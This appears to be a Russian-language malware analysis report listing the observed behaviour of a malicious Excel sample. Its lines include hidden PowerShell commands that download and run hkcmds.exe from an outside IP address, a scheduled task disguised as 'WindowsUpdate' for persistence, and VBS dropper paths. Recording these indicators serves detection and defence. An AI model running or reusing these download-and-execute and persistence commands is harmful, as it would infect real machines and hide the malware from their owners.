Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\chromium.vbs"
- %TEMP%\chromium.vbs
- <Текущая директория>\babe0000
- <PATH_SAMPLE>.xls
- '10#.#68.46.25':80
- http://10#.#68.46.25/FFC/000000000000000%23%23%23%23%23%23%23%23%23%23%23%23%23%23000000000000000000%23%23%23%23%23%23%23%23%23%23%23%23%23%2300000000000%23%23%23%23%23%23%23%230.DOC
- http://10#.#68.46.25/890/ChromeSetup.vbs
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& { curl http://104.168.46.25/890/oj/hkcmds.exe -o %WINDIR%\Temp\hkcmd.exe; Start-Process powershell.exe %WINDIR%\Temp\hkcmd.exe...' (со скрытым окном)
- '%ProgramFiles%\microsoft office\office14\winword.exe' -Embedding
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\schtasks.exe' /create /sc MINUTE /mo 100 /tn "WindowsUpdate" /tr "\"<SYSTEM32>\WindowsPowershell\v1.0\powershell.exe\" -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command curl http://104.168.46.2...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& { curl http://104.168.46.25/890/oj/hkcmds.exe -o %WINDIR%\Temp\hkcmd.exe; Start-Process powershell.exe %WINDIR%\Temp\hkcmd.exe...
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' %WINDIR%\Temp\hkcmd.exe